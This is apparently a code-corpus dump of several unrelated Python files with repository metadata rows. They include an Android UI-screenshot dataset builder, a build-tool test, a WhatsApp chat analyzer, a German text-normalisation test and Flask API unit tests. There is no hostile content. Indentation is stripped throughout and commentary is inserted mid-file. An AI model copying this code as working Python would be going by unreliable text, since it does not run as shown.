from PIL import Image, ImageFile, ImageDraw, ImageFont
ImageFile.LOAD_TRUNCATED_IMAGES = True
parser = argparse.ArgumentParser()
parser.add_argument("--input_dir", required=True, help="path to folder containing app packages")
a = parser.parse_args()
outputDir = "android_data_ambig_aug2_pb"
dir_img = os.path.join(outputDir, "PNGImages")
dir_set = os.path.join(outputDir, "ImageSets")
dir_ann = os.path.join(outputDir, "Annotations")
#target_list = ["Button", "ImageButton", "CompoundButton", "ProgressBar", "SeekBar", "Chronometer", "CheckBox", "RadioButton", "Switch", "EditText", "ToggleButton", "RatingBar", "Spinner",] # "View"]
target_list = ["TextView", "Button", "ImageButton", "SeekBar", "CheckBox", "RadioButton", "EditText",]
def checkFileValidity(inputFile):
'''
Check the validity of the XML file and skip it if necessary.
For unknown reasons, the content of some XML files is repetitive or otherwise malformed.
'''
homeScreen_list = ["Make yourself at home", "You can put your favorite apps here.", "To see all your apps, touch the circle."]
unlockHomeScreen_list = ["Camera", "[16,600][144,728]", "Phone", "[150,1114][225,1189]", "People", "[256,1114][331,1189]", "Messaging", "[468,1114][543,1189]", "Browser", "[574,1114][649,1189]"]
browser = ["com.android.browser:id/all_btn", "[735,108][800,172]", "com.android.browser:id/taburlbar", "com.android.browser:id/urlbar_focused"]
with open(inputFile) as f:
content = f.read()
#it is the layout code for the whole window and no rotation
if 'bounds="[0,0][800,1216]"' in content and '<hierarchy rotation="1">' not in content:
if not all(keyword in content for keyword in browser) and not all(keyword in content for keyword in homeScreen_list) and not all(keyword in content for keyword in unlockHomeScreen_list):
#it should not be the homepage of the phone
bounds_list = re.findall(r'bounds="(.+?)"', content)
if len(bounds_list) < 2:
return False
#if float(len(bounds_list)) / len(set(bounds_list)) < 1.2: #so far, we do not check this option
#print len(text_list), len(set(text_list)), inputFile.split("\\")[-1]
return True
return False
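checkFileValidity decides whether a uiautomator dump is usable by checking for the full-screen bounds and pulling every `bounds="..."` attribute with a regex. A self-contained sketch of that extraction on a toy snippet (`extract_bounds` is a hypothetical helper, not part of this script):

```python
import re

def extract_bounds(xml_content):
    # Pull every bounds="[x1,y1][x2,y2]" attribute, as checkFileValidity does,
    # and parse the four coordinates into integer tuples.
    boxes = []
    for b in re.findall(r'bounds="(.+?)"', xml_content):
        x1, y1, x2, y2 = map(int, re.findall(r'\d+', b))
        boxes.append(((x1, y1), (x2, y2)))
    return boxes
```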
def getDimensions(coor_from, coor_to):
dim = {}
dim['width'] = coor_to[0] - coor_from[0]
dim['height'] = coor_to[1] - coor_from[1]
return dim
def remove_overlap(widgets, status_bar):
global countValidFile, train_val
w = []
widgets.reverse()
layout = np.zeros((801,1217), dtype=np.int)
for idx, widget in enumerate(widgets):
overlap = False
starti = widget['coordinates']['from'][0] + 1
endi = widget['coordinates']['to'][0] - 1
startj = widget['coordinates']['from'][1] + 1
endj = widget['coordinates']['to'][1] - 1
for i in range(starti, endi + 1):
for j in range(startj, endj + 1):
if layout[i][j] == 1:
if widget['leaf']:
overlap = True
layout[i][j] = -1
elif layout[i][j] == -1:
overlap = True
elif layout[i][j] == 2:
if widget['leaf']:
overlap = True
layout[i][j] = -1
else:
if widget['leaf']:
layout[i][j] = 1
else:
layout[i][j] = 2
if overlap == True:
continue
else:
if widget['leaf'] and widget['widget_class'] in target_list:
if widget['widget_class'] == "View" and not(widget['clickable'] == "true" and widget['focusable'] == "true"):
continue
w.append(widget)
if w:
with countValidFile.get_lock():
countValidFile.value += 1
try:
im = Image.open(w[0]['src']+'.png')
if status_bar:
clip = im.crop((0, 33, 800, 1216))
else:
clip = im.crop((0, 0, 800, 1216))
except OSError as err:
print w[0]['src']
print "[-] OSError - " + str(err)
sys.stdout.flush()
return  # clip is undefined when the crop failed, so bail out instead of falling through
except IndexError as err:
print w[0]['src']
print "[-] IndexError - " + str(err)
sys.stdout.flush()
#print "[-] " + str(widget['coordinates'])
#print "[-] " + str(widget['dimensions'])
return
except IOError as err: #image file is truncated
print w[0]['src']
print "[-] IOError - " + str(err)
sys.stdout.flush()
return
clip.save(os.path.join(dir_img, "{0:0>6}.png".format(countValidFile.value)))
if countValidFile.value % 30 == 1:
val = train_val['val']
val.append("{:06d}".format(countValidFile.value))
train_val['val'] = val
else:
train = train_val['train']
train.append("{:06d}".format(countValidFile.value))
train_val['train'] = train
trainval = train_val['trainval']
trainval.append("{:06d}".format(countValidFile.value))
train_val['trainval'] = trainval
with open(os.path.join(dir_ann, "{0:0>6}.txt".format(countValidFile.value)), 'a+') as f:
#tmp = {}
#tmp['app'] = w
json.dump(w, f, sort_keys=True, indent=3, separators=(',', ': '))
#with open(os.path.join(dir_ann, "{0:0>6}.txt".format(countValidFile.value)), 'a+') as f:
# json.dump(widget, f, sort_keys=True, indent=3, separators=(',', ': '))
def compareHisto(first, sec):
imA = Image.open(first)
imB = Image.open(sec)
# Normalise the scale of images
if imA.size[0] > imB.size[0]:
imA = imA.resize((imB.size[0], imA.size[1]))
else:
imB = imB.resize((imA.size[0], imB.size[1]))
if imA.size[1] > imB.size[1]:
imA = imA.resize((imA.size[0], imB.size[1]))
else:
imB = imB.resize((imB.size[0], imA.size[1]))
hA = imA.histogram()
hB = imB.histogram()
sum_hA = 0.0
sum_hB = 0.0
diff = 0.0
for i in range(len(hA)):
#print(sum_hA)
sum_hA += hA[i]
sum_hB += hB[i]
diff += abs(hA[i] - hB[i])
return diff/(2*max(sum_hA, sum_hB))
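compareHisto normalizes the summed absolute bin differences by twice the larger histogram total, so identical images score 0 and completely disjoint histograms score 1. The same metric on plain lists, without PIL (`histo_distance` is an illustrative name):

```python
def histo_distance(hA, hB):
    # Same normalization as compareHisto: sum of |hA[i] - hB[i]| over
    # twice the larger total mass, so the result lies in [0, 1].
    diff = sum(abs(a - b) for a, b in zip(hA, hB))
    return diff / (2.0 * max(sum(hA), sum(hB)))
```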
def rem(ann):
ann['coordinates']['from'] = list(ann['coordinates']['from'])
ann['coordinates']['to'] = list(ann['coordinates']['to'])
ann['coordinates']['from'][1] = ann['coordinates']['from'][1] - 33
ann['coordinates']['to'][1] = ann['coordinates']['to'][1] - 33
ann['coordinates']['from'] = tuple(ann['coordinates']['from'])
ann['coordinates']['to'] = tuple(ann['coordinates']['to'])
return ann
def augment(img, anns):
global stats
width, height = img.size
img = np.array(img, dtype=np.uint8)
valid = []
kps = []
for a in anns:
x1 = a['coordinates']['from'][0]
y1 = a['coordinates']['from'][1]
x2 = a['coordinates']['to'][0]
y2 = a['coordinates']['to'][1]
kps.extend([ia.Keypoint(x=x1, y=y1), ia.Keypoint(x=x2, y=y2),])
stats[a['widget_class']] += 1
keypoints = ia.KeypointsOnImage(kps, shape=img.shape)
#seq = iaa.Sequential([iaa.Fliplr(1.0)])
'''
seq = iaa.SomeOf(1, [
iaa.Fliplr(1.0),
iaa.CropAndPad(percent=(-0.25, 0.25)),
iaa.CropAndPad(percent=(-0.2, 0.2))
])
'''
seq = iaa.Sometimes(
0.3,
iaa.Fliplr(1.0),
iaa.CropAndPad(percent=(-0.25, 0.25))
)
seq_det = seq.to_deterministic()
# augment keypoints and images
img_aug = seq_det.augment_images([img])[0]
keypoints_aug = seq_det.augment_keypoints([keypoints])[0]
im = Image.fromarray(img_aug)
#for i, value in range(len(anns)):
for i, value in enumerate(anns):
'''
if keypoints_aug.keypoints[i*2].x == -1:
keypoints_aug.keypoints[i*2].x = 0
if keypoints_aug.keypoints[i*2+1].x == -1:
keypoints_aug.keypoints[i*2+1].x = 0
'''
if keypoints_aug.keypoints[i*2].x > keypoints_aug.keypoints[i*2+1].x:
temp = keypoints_aug.keypoints[i*2].x
keypoints_aug.keypoints[i*2].x = keypoints_aug.keypoints[i*2+1].x
keypoints_aug.keypoints[i*2+1].x = temp
if keypoints_aug.keypoints[i*2].x < 0:
keypoints_aug.keypoints[i*2].x = 0
if keypoints_aug.keypoints[i*2].x > width:
keypoints_aug.keypoints[i*2].x = width
if keypoints_aug.keypoints[i*2+1].x < 0:
keypoints_aug.keypoints[i*2+1].x = 0
if keypoints_aug.keypoints[i*2+1].x > width:
keypoints_aug.keypoints[i*2+1].x = width
if keypoints_aug.keypoints[i*2].y < 0:
keypoints_aug.keypoints[i*2].y = 0
if keypoints_aug.keypoints[i*2].y > height:
keypoints_aug.keypoints[i*2].y = height
if keypoints_aug.keypoints[i*2+1].y < 0:
keypoints_aug.keypoints[i*2+1].y = 0
if keypoints_aug.keypoints[i*2+1].y > height:
keypoints_aug.keypoints[i*2+1].y = height
anns[i]['dimensions'] = getDimensions((keypoints_aug.keypoints[i*2].x, keypoints_aug.keypoints[i*2].y), (keypoints_aug.keypoints[i*2+1].x, keypoints_aug.keypoints[i*2+1].y))
if anns[i]['dimensions']['width'] == 0 or anns[i]['dimensions']['height'] == 0:
continue
anns[i]['coordinates']['from'] = (keypoints_aug.keypoints[i*2].x, keypoints_aug.keypoints[i*2].y)
anns[i]['coordinates']['to'] = (keypoints_aug.keypoints[i*2+1].x, keypoints_aug.keypoints[i*2+1].y)
valid.append(i)
aug_anns = []
for idx in valid:
aug_anns.append(anns[idx])
'''
im = Image.fromarray(img_aug)
draw = ImageDraw.Draw(im)
for a in aug_anns:
draw.rectangle((a['coordinates']['from'], a['coordinates']['to']), outline="red")
'''
'''
for i in range(0,len(keypoints.keypoints),2):
before = keypoints.keypoints[i]
after = keypoints_aug.keypoints[i]
print "Keypoint %d: (%.8f, %.8f) -> (%.8f, %.8f)" % (i, before.x, before.y, after.x, after.y)
draw.rectangle((keypoints_aug.keypoints[i].x, keypoints_aug.keypoints[i].y, keypoints_aug.keypoints[i+1].x, keypoints_aug.keypoints[i+1].y), outline="red")
im.show()
'''
if aug_anns:
train_test_split(im, aug_anns, True)
def train_test_split(clip, anns, aug=False):
global countValidFile, train_val
with countValidFile.get_lock():
countValidFile.value += 1
count = countValidFile.value
if aug:
train = train_val['train']
train.append("{:06d}".format(count))
train_val['train'] = train
else:
if count % 15 == 1:
val = train_val['val']
val.append("{:06d}".format(count))
train_val['val'] = val
else:
aug = True
train = train_val['train']
train.append("{:06d}".format(count))
train_val['train'] = train
trainval = train_val['trainval']
trainval.append("{:06d}".format(count))
train_val['trainval'] = trainval
with open(os.path.join(dir_ann, "{0:0>6}.txt".format(count)), 'a+') as f:
json.dump(anns, f, sort_keys=True, indent=3, separators=(',', ': '))
'''
draw = ImageDraw.Draw(clip)
for a in anns:
draw.rectangle((a['coordinates']['from'], a['coordinates']['to']), outline="red")
'''
clip.save(os.path.join(dir_img, "{0:0>6}.png".format(count)))
return aug
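`train_test_split` assigns roughly one of every 15 samples (or 10 in the unaugmented path in `preprocess`) to validation via a modulo rule on the running counter. The rule in isolation (names hypothetical):

```python
def split_bucket(count, val_every=15):
    # Counters where count % val_every == 1 go to validation,
    # everything else to training.
    return 'val' if count % val_every == 1 else 'train'

[split_bucket(c) for c in (1, 2, 15, 16)]
# -> ['val', 'train', 'train', 'val']
```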
def preprocess(input_folder):
global countValidFile, train_val
pnglist = []
hash_dict = {}
for infile in glob.glob(input_folder + "/stoat_fsm_output/ui/*.xml"):
widgets_xml = []
status_bar = False
name, ext = os.path.splitext(infile)
pngfile = infile.replace('.xml', '.png')
if os.path.exists(pngfile) and os.stat(pngfile).st_size > 0 and checkFileValidity(infile):
try:
Image.open(pngfile)
except Exception as e:
print e
sys.stdout.flush()
continue
# check for duplicate image
dup = False
if not pnglist:
pnglist.append(pngfile)
else:
for png in pnglist:
diff_score = compareHisto(pngfile, png)
if diff_score < 0.051:
dup = True
break
if dup:
continue
else:
pnglist.append(pngfile)
ctx = etree.iterparse(infile, events=('start',), tag='node')
for event, elem in ctx:
# Check for Android status bar
if elem.attrib['bounds'] == "[0,33][800,1216]":
status_bar = True
widget_name = elem.attrib['class'].split('.')[-1]
coordinates = re.findall(r"(?<=\[).*?(?=\])", elem.attrib["bounds"])
if len(coordinates) != 2:
continue
#if not widget_name in target_list:
# continue
#if not widget_name in layout and len(elem.getchildren()) != 0:
# continue
if not widget_name in target_list or len(elem.getchildren()) != 0:
continue
coor_from = tuple(map(int, coordinates[0].split(",")))
coor_to = tuple(map(int, coordinates[1].split(",")))
if not (coor_from[0] > 800 or coor_from[0] < 0 or coor_to[0] > 800 or coor_to[0] < 0 or coor_from[1] > 1216 or coor_from[1] < 0 or coor_to[1] > 1216 or coor_to[1] < 0):
meta_data = {}
meta_data['widget_class'] = widget_name
meta_data['coordinates'] = {'from': coor_from, 'to': coor_to}
meta_data['dimensions'] = getDimensions(coor_from, coor_to)
if meta_data['dimensions']['width'] == 0 or meta_data['dimensions']['height'] == 0:
continue
#if (meta_data['widget_class'] in layout and not(len(elem.getchildren()) == 2 and elem.getchildren()[0].attrib['class'].split('.')[-1] == "ImageView" and len(elem.getchildren()[0].getchildren()) == 0 and elem.getchildren()[1].attrib['class'].split('.')[-1] == "TextView" and len(elem.getchildren()[1].getchildren()) == 0)):
# continue
#if meta_data['widget_class'] == "TextView" and not(not(elem.attrib['checkable'] == "true") and not(elem.attrib['checked'] == "true") and elem.attrib['clickable'] == "true" and elem.attrib['enabled'] == "true" and elem.attrib['focusable'] == "true" and not(elem.attrib['focused'] == "true") and not(elem.attrib['scrollable'] == "true") and elem.attrib['long-clickable'] == "true"):
# continue
if (meta_data['widget_class'] == "TextView" and not(len(elem.attrib['text'].split(" ")) <= 3 and not(elem.attrib['checkable'] == "true") and not(elem.attrib['checked'] == "true") and elem.attrib['clickable'] == "true" and elem.attrib['enabled'] == "true" and elem.attrib['focusable'] == "true" and not(elem.attrib['focused'] == "true") and not(elem.attrib['scrollable'] == "true") and elem.attrib['long-clickable'] == "true")):
continue
# Classify ProgressBar (PB) as circular/horizontal based on aspect ratio; the rest are regarded as invalid
# Circular PB: aspect_ratio == 1
# Horizontal PB: aspect_ratio < 0.3
'''
if meta_data['widget_class'] == "ProgressBar":
ar = float(meta_data['dimensions']['height']) / float(meta_data['dimensions']['width'])
if ar == 1:
meta_data['widget_class'] = "CirProgressBar"
elif ar < 0.3:
meta_data['widget_class'] = "HrzProgressBar"
else:
widgets_xml = []
break
'''
meta_data['text'] = elem.attrib['text']
meta_data['clickable'] = elem.attrib['clickable']
meta_data['focusable'] = elem.attrib['focusable']
meta_data["content-desc"] = elem.attrib['content-desc']
meta_data['src'] = name
#if meta_data['widget_class'] == "TextView" or meta_data['widget_class'] in layout:
if meta_data['widget_class'] == "TextView":
meta_data['widget_class'] = "ImageButton"
widgets_xml.append(meta_data)
else:
continue
if widgets_xml:
try:
im = Image.open(pngfile)
if status_bar:
clip = im.crop((0, 32, 800, 1216))
w = [rem(ann) for ann in widgets_xml if not (ann['coordinates']['from'][1] < 33 or ann['coordinates']['to'][1] < 33)]
else:
clip = im.crop((0, 0, 800, 1216))
w = widgets_xml
except OSError as err:
print pngfile
print "[-] OSError - " + str(err)
sys.stdout.flush()
continue
except IndexError as err:
print pngfile
print "[-] IndexError - " + str(err)
sys.stdout.flush()
continue
except IOError as err: #image file is truncated
print pngfile
print "[-] IOError - " + str(err)
sys.stdout.flush()
continue
'''
fnt = ImageFont.truetype("arial.ttf", 17)
draw = ImageDraw.Draw(clip)
for label in w:
draw.rectangle((label['coordinates']['from'], label['coordinates']['to']), outline="black")
draw.text(label['coordinates']['from'], label['widget_class'], font=fnt, fill="black")
clip.save(os.path.join(dir_img, "{0:0>6}.png".format(count)))
'''
# Train/Test split for augmented dataset
'''
aug = train_test_split(clip, w)
if aug:
augment(clip, w)
'''
# Train/Test split for unaugmented dataset
with countValidFile.get_lock():
countValidFile.value += 1
count = countValidFile.value
if count % 10 == 1:
val = train_val['val']
val.append("{:06d}".format(count))
train_val['val'] = val
else:
train = train_val['train']
train.append("{:06d}".format(count))
train_val['train'] = train
trainval = train_val['trainval']
trainval.append("{:06d}".format(count))
train_val['trainval'] = trainval
with open(os.path.join(dir_ann, "{0:0>6}.txt".format(count)), 'a+') as f:
json.dump(w, f, sort_keys=True, indent=3, separators=(',', ': '))
clip.save(os.path.join(dir_img, "{0:0>6}.png".format(count)))
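`preprocess` above pulls widget corners out of the XML `bounds` attribute with a lookbehind/lookahead regex; the parsing step on its own (function name hypothetical):

```python
import re

def parse_bounds(bounds):
    # Extract the two "[x,y]" corner groups from an Android `bounds`
    # attribute using the same lookbehind/lookahead regex as above.
    pairs = re.findall(r"(?<=\[).*?(?=\])", bounds)
    return [tuple(map(int, p.split(','))) for p in pairs]

parse_bounds("[0,33][800,1216]")  # -> [(0, 33), (800, 1216)]
```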
def init(c, t, s):
global countValidFile, train_val, stats
countValidFile = c
train_val = t
train_val['train'] = []
train_val['val'] = []
train_val['trainval'] = []
stats = s
for t in target_list:
stats[t] = 0
if __name__ == '__main__':
countValidFile = Value('i', 0)
train_val = Manager().dict()
stats = Manager().dict()
folders_list = glob.glob(a.input_dir + "/*20170510_cleaned_outputs*/**")
'''
fname = os.path.join("android_data", "Annotations", "000001.txt")
with open(fname) as f:
datastore = json.load(f)
bb_from = datastore[0]['coordinates']['from']
print bb_from, bb_from[0]
'''
#create dataset directory
dir_list = [outputDir, dir_img, dir_set, dir_ann]
if os.path.exists(outputDir):
shutil.rmtree(outputDir)
for d in dir_list:
os.makedirs(d)
num_processed = 0
pool = Pool(processes=6, initializer=init, initargs=(countValidFile, train_val, stats))
#pool = Pool(processes=6)
for r in pool.imap(preprocess, folders_list):
num_processed += 1
if num_processed % 5 == 0:
print "%s of %s processed" % (num_processed, len(folders_list))
sys.stdout.flush()
pool.close()
pool.join()
with open(os.path.join(dir_set, "train.txt"), 'a+') as f:
for idx in train_val["train"]:
f.write("%s\n" % idx)
with open(os.path.join(dir_set, "val.txt"), 'a+') as f:
for idx in train_val["val"]:
f.write("%s\n" % idx)
with open(os.path.join(dir_set, "trainval.txt"), 'a+') as f:
for idx in train_val["trainval"]:
f.write("%s\n" % idx)
with open(os.path.join(dir_set, "stats.txt"), 'a+') as f:
for t in target_list:
f.write("{} - {}\n".format(t, stats[t]))
| 32.806859 | 435 | 0.643301 | 2,679 | 18,175 | 4.266144 | 0.155282 | 0.041998 | 0.07166 | 0.075072 | 0.420072 | 0.371511 | 0.349987 | 0.284889 | 0.250853 | 0.214629 | 0 | 0.030718 | 0.17249 | 18,175 | 554 | 436 | 32.806859 | 0.729189 | 0.120165 | 0 | 0.338798 | 0 | 0 | 0.141492 | 0.014844 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.008197 | 0.038251 | null | null | 0.038251 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7acbb0a39bd2e8157fd784661046a2e583513ba0 | 1,256 | py | Python | examples/test01.py | pyrate-build/pyrate-build | 8ce9c2dd2b94b50aebfd058e1dd8731cbb192e6d | [
"Apache-2.0"
] | 41 | 2016-01-14T15:28:53.000Z | 2022-03-17T12:43:01.000Z | examples/test01.py | pyrate-build/pyrate-build | 8ce9c2dd2b94b50aebfd058e1dd8731cbb192e6d | [
"Apache-2.0"
] | 5 | 2016-01-20T09:42:30.000Z | 2016-12-22T22:54:27.000Z | examples/test01.py | pyrate-build/pyrate-build | 8ce9c2dd2b94b50aebfd058e1dd8731cbb192e6d | [
"Apache-2.0"
] | 3 | 2016-01-20T09:40:28.000Z | 2020-10-29T09:33:48.000Z | import logging
assert(pyrate_version > (0, 1, 9))
assert(pyrate_version >= '0.1.10')
assert(pyrate_version != '0.0.1')
assert(pyrate_version == pyrate_version)
match('*.cpp', recurse = True)
exe = executable('test.bin', ['test.cpp'])
exe = executable('test.bin', ['test.cpp'])
try:
executable('test.bin', ['test.cpp', None])
except Exception:
logging.critical('None found!')
try:
executable('test.bin', ['test.cpp', version])
except Exception:
logging.critical('Invalid input!')
find_external('libc++')
find_external('abcd')
find_toolchain('abcd')
str(exe)
str(default_context.platform)
str(exe.build_src[0])
str(exe.build_rule)
repr(default_context.platform)
repr(macro('DEBUG'))
repr(toolchain)
repr(tools)
len(tools)
str(install(exe)[0])
for tool in tools:
logging.critical('%s: %s', tool, repr(tools[tool]))
logging.critical('deleting c/c++')
del tools['c']
del tools['cpp']
for tool in tools:
logging.critical('%s: %s', tool, repr(tools[tool]))
try:
object_file('test.obj', ['test.cpp'])
except Exception:
logging.critical('rule not found!')
try:
find_rule('object', 'cpp')
except Exception:
logging.critical('rule not found!')
try:
find_internal('test.bin')
except Exception:
logging.critical('multiple test.bins found!')
assert(False)
| 24.153846 | 52 | 0.713376 | 184 | 1,256 | 4.788043 | 0.315217 | 0.136209 | 0.124858 | 0.170261 | 0.397276 | 0.349603 | 0.227015 | 0.227015 | 0.227015 | 0.227015 | 0 | 0.010536 | 0.093153 | 1,256 | 51 | 53 | 24.627451 | 0.76295 | 0 | 0 | 0.367347 | 0 | 0 | 0.192675 | 0 | 0 | 0 | 0 | 0 | 0.102041 | 1 | 0 | false | 0 | 0.020408 | 0 | 0.020408 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7acc9ee1bc31164a1469a0d9996ab350cd9b5055 | 1,424 | py | Python | pshychocloud/WAPPMessageAnalyzer.py | partu18/pshychocloud | 208d8d3dd646637719f70a86f9d9e43dd2eed929 | [
"MIT"
] | null | null | null | pshychocloud/WAPPMessageAnalyzer.py | partu18/pshychocloud | 208d8d3dd646637719f70a86f9d9e43dd2eed929 | [
"MIT"
] | 2 | 2021-06-08T19:28:41.000Z | 2021-09-07T23:47:14.000Z | pshychocloud/WAPPMessageAnalyzer.py | partu18/pshychocloud | 208d8d3dd646637719f70a86f9d9e43dd2eed929 | [
"MIT"
] | null | null | null | from MessageAnalyzer import MessageAnalyzer
class WAPPMessageAnalyzer(MessageAnalyzer):
WAPP_DATE_REGEX = "[0-9]{1,2}/[0-9]{1,2}/[0-9]{1,2}"
WAPP_TIME_REGEX = "[0-9]{1,2}:[0-9]{1,2}"
WAPP_EXTRACT_PARTICIPANT_REGEX = r"{date}\s*,\s*{time}\s*-\s*(.+?)\s*:\s*"\
.format(
date=WAPP_DATE_REGEX,
time=WAPP_TIME_REGEX
)
WAPP_EXTRACT_MESSAGE_REGEX = r"{date}\s*,\s*{time}\s*-\s*{participant}\s*:\s+(.+?)$"\
.format(
date=WAPP_DATE_REGEX,
time=WAPP_TIME_REGEX,
participant='%s' #UGLY UGLY UGLY!
)
WAPP_PARTICIPANT_WILDCARD = "[^:]+"
extract_message_regex = WAPP_EXTRACT_MESSAGE_REGEX
participant_wildcard = WAPP_PARTICIPANT_WILDCARD
extract_participant_regex = WAPP_EXTRACT_PARTICIPANT_REGEX
def _get_clean_words_from_line(self, line):
'''
Remove WhatsApp automatically generated messages
'''
omitted_file = '<Archivo omitido>'.lower()
filtered_line = '' if omitted_file in line else line
return super(WAPPMessageAnalyzer, self)._get_clean_words_from_line(filtered_line)
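The class composes its extraction patterns from the date/time fragments above; a quick check of the participant regex outside the class (the sample chat line is hypothetical):

```python
import re

# Same building blocks as the class attributes above.
DATE = r"[0-9]{1,2}/[0-9]{1,2}/[0-9]{1,2}"
TIME = r"[0-9]{1,2}:[0-9]{1,2}"
PARTICIPANT = r"{d}\s*,\s*{t}\s*-\s*(.+?)\s*:\s*".format(d=DATE, t=TIME)

m = re.match(PARTICIPANT, "12/31/21, 10:15 - Alice: hello there")
m.group(1)  # -> 'Alice'
```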
| 45.935484 | 89 | 0.514045 | 143 | 1,424 | 4.79021 | 0.300699 | 0.020438 | 0.021898 | 0.029197 | 0.359124 | 0.230657 | 0.230657 | 0.230657 | 0.178102 | 0.122628 | 0 | 0.022472 | 0.375 | 1,424 | 31 | 90 | 45.935484 | 0.747191 | 0.044944 | 0 | 0.173913 | 0 | 0.043478 | 0.125281 | 0.107277 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043478 | false | 0 | 0.043478 | 0 | 0.521739 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
7ad2878054453ac85ec36e78b1add4ee655d5d36 | 549 | py | Python | test_normalize_sentences.py | Alienmaster/german-asr-lm-tools | acd014181addf01569732bfc437ac130de6dd311 | [
"Apache-2.0"
] | 11 | 2020-06-28T16:08:05.000Z | 2022-01-20T08:50:22.000Z | test_normalize_sentences.py | Alienmaster/german-asr-lm-tools | acd014181addf01569732bfc437ac130de6dd311 | [
"Apache-2.0"
] | 3 | 2020-06-24T11:09:18.000Z | 2021-08-13T15:26:33.000Z | test_normalize_sentences.py | Alienmaster/german-asr-lm-tools | acd014181addf01569732bfc437ac130de6dd311 | [
"Apache-2.0"
] | 3 | 2020-06-13T11:41:49.000Z | 2020-09-14T15:47:46.000Z | import normalize_sentences
import spacy
nlp = spacy.load('de_core_news_sm')
test_sentence = 'Der schlaue Fuchs sagte "Treffen um 16:20 Uhr!" aber war schon 20 Minuten früher da. Im Jahre 1995 schuf er das Gedicht.'
def test_sent(test_sentence):
result = normalize_sentences.normalize(nlp, test_sentence)
print(test_sentence, '->', result)
test_sent('Der schlaue Fuchs sagte "Treffen um 16:20 Uhr!" aber war schon 20 Minuten früher da. Im Jahre 1995 schuf er das Gedicht.')
test_sent('Er war von 1920 bis 1988 durchgehend beschäftigt.')
| 36.6 | 138 | 0.765027 | 88 | 549 | 4.636364 | 0.5 | 0.117647 | 0.073529 | 0.098039 | 0.455882 | 0.455882 | 0.455882 | 0.455882 | 0.455882 | 0.455882 | 0 | 0.060086 | 0.151184 | 549 | 14 | 139 | 39.214286 | 0.815451 | 0 | 0 | 0 | 0 | 0.222222 | 0.557377 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.222222 | 0 | 0.333333 | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7ad867b12b57deb0d8a3770340fa6ea4f03970c1 | 2,184 | py | Python | webapp/test/app_test2.py | PratikMahajan/Recipe-Management-Webapp-And-Infrastructure | 234b0685ee0367a3e37401af3bd77d6fc6cde6ce | [
"Apache-2.0"
] | null | null | null | webapp/test/app_test2.py | PratikMahajan/Recipe-Management-Webapp-And-Infrastructure | 234b0685ee0367a3e37401af3bd77d6fc6cde6ce | [
"Apache-2.0"
] | null | null | null | webapp/test/app_test2.py | PratikMahajan/Recipe-Management-Webapp-And-Infrastructure | 234b0685ee0367a3e37401af3bd77d6fc6cde6ce | [
"Apache-2.0"
] | null | null | null | from app import app
import unittest
import base64
import json
class TestLogin(unittest.TestCase):
def setUp(self):
app.config['TESTING'] = True
self.app = app.test_client()
self.user_name = "test2n1@mytest.com"
self.password = "thi@isMyPass123"
self.valid_credentials = base64.b64encode(b'pratik@mahajan.xyz:123@Abcd').decode('utf-8')
self.invalid_password = base64.b64encode(b'test@mytest.com:ssword11').decode('utf-8')
self.invalid_username = base64.b64encode(b'karan@example.com:password11').decode('utf-8')
def test_user_create_recipe_invalid_credentials(self):
datajson=json.dumps({
"cook_time_in_min": 15,
"prep_time_in_min": 15,
"title": "Creamy Cajun Chicken Pasta",
"cuisine": "Italian",
"servings": 2,
"ingredients": [
"4 ounces linguine pasta",
"2 boneless, skinless chicken breast halves, sliced into thin strips",
"2 teaspoons Cajun seasoning",
"2 tablespoons butter"
],
"steps": [
{
"position": 1,
"items": "some text here"
}
],
"nutrition_information": {
"calories": 100,
"cholesterol_in_mg": 4,
"sodium_in_mg": 100,
"carbohydrates_in_grams": 53.7,
"protein_in_grams": 53.7
}
})
response = self.app.post(
'/v1/recipe/', data=datajson, content_type='application/json',
headers={'Authorization': 'Basic ' + self.invalid_password})
self.assertEqual(response.status_code, 401)
def test_user_recipe_get(self):
response = self.app.get(
'/v1/recipe/f5e02bd4-55da-4243-b7fb-980b230a1138')
self.assertEqual(response.status_code, 404)
# def test_user_recipe_delete(self):
# response = self.app.delete(
# '/v1/recipe/f5e02bd4-55da-4243-b7fb-980b230a1138', headers={'Authorization': 'Basic ' + self.valid_credentials})
# self.assertEqual(response.status_code, 403)
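The tests build HTTP Basic credentials by base64-encoding `user:password`; a small helper showing the same construction (names hypothetical):

```python
import base64

def basic_auth_header(user, password):
    # RFC 7617 Basic scheme: base64("user:password"), decoded back to
    # str so it can be concatenated into the Authorization header.
    token = base64.b64encode('{}:{}'.format(user, password).encode()).decode('utf-8')
    return {'Authorization': 'Basic ' + token}

basic_auth_header('alice', 'secret')
# -> {'Authorization': 'Basic YWxpY2U6c2VjcmV0'}
```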
